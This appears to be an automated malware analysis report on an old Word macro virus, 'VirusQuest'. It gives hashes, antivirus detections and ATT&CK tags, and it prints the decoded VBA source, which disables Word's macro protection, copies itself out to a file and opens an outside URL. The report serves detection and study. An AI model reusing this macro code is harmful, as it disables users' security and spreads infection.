Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d970215cdfed5213…

MALICIOUS

Office (OLE)

39.5 KB Created: 1999-07-04 06:53:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ba75fd78184e6ead1392444e6d82f118 SHA-1: 3c4b8eda3519e531585e7b8a31218ae0180d5afa SHA-256: d970215cdfed521366220a25ecb961de5ad979bbec153bf5fd28c80149cd5625
142 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1204.002 Malicious Link

The sample is a malicious Word document containing VBA macros. The macro attempts to disable security features and then executes a hyperlink to 'http://www.jring.inter.net/'. It also attempts to export itself as 'c:\VirusQuest.sys', suggesting a downloader or dropper functionality. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further indicate malicious intent.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.jring.inter.net/ In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1910 bytes
SHA-256: 77a176e87e2b77f27dda07575ca992c5bec478827c439425220fab50fe7bfb15
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VirusQuest"
'======================================================
'  VirusQuest by Dr Virus Quest
'  Origin from Malaysia
'  Copyright©1999
'======================================================

Public Skip As Integer

Private Sub VirusQuest()

On Error Resume Next

If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Application.ScreenUpdating = False
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("VirusQuest").Export "c:\VirusQuest.sys"

ActiveDocument.ReadOnlyRecommended = False

With Dialogs(wdDialogFileSummaryInfo)
    .Author = "Dr Virus Quest"
    .Execute
End With

    ActiveDocument.FollowHyperlink Address:= _
"http://www.jring.inter.net/" _
        , NewWindow:=False, AddHistory:=True
End Sub

Private Sub Effect()
  On Error Resume Next
  If Day(Date) = "1" Then
  Assistant.Visible = True
  With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Author: Dr Virus Quest"
    .Heading = "VirusQuest"
    .Animation = msoAnimationSearching
    .Show
  End With
  MsgBox "Thanks friends", vbOKOnly, "VirusQuest"
Else
End If
End Sub